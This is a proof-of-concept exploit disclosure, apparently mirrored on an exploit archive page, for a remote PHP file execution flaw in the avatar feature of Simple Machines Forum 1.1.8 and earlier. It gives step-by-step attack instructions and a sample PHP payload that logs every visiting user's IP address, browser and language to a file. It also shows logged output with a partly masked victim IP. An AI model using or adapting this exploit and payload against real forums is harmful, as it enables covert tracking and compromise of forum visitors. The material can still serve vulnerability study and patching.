扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at]hotmail.com website: http://www.hack0wn.com/ - About Vulnerability: This vulnerability allow execute a php external file in any visitor of the forum. The php file should have the malicious code. The scope of the attack depends on the strength of the php file. - Step by Step: 1) go to your profile in section of avatar. 2) put the url of the malicious php file as avatar (ex: http://target/poc.php). 3) create a new topic. - [victims] All the people that visit the topic will be infect. malicious file example [steal info]: (poc.php) <?php $ip = $_SERVER['REMOTE_ADDR']; $so= $_SERVER['HTTP_USER_AGENT']; $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE']; $url= $_SERVER['PHP_SELF']; $path= $_SERVER['DOCUMENT_ROOT']; $archivo = 'hacks.txt'; $fp = fopen($archivo, "a"); $string = " Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC by Jose Luis Gongora Fernandez (aka) JosS $path$url VICTIM: $ip info: $so language: $lan "; $write = fputs($fp, $string); fclose($fp); ?> ------END----- cat hacks.txt Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC by Jose Luis Gongora Fernandez (aka) JosS /***/***/vhosts/hack0wn.com/httpdocs/poc.php VICTIM: 88.25.92.*** info: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.19) Gecko/20081202 Iceweasel/2.0.0.19 (Debian-2.0.0.19-0etch1) language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 // tested on smf 1.1.8 __h0__ ________________________________ ¿Sabes que la Videollamada de Messenger es GRATIS ¡Descúbrela!<http://events.es.msn.com/windows-live/redes-sociales/default.aspx> |
体验盒子
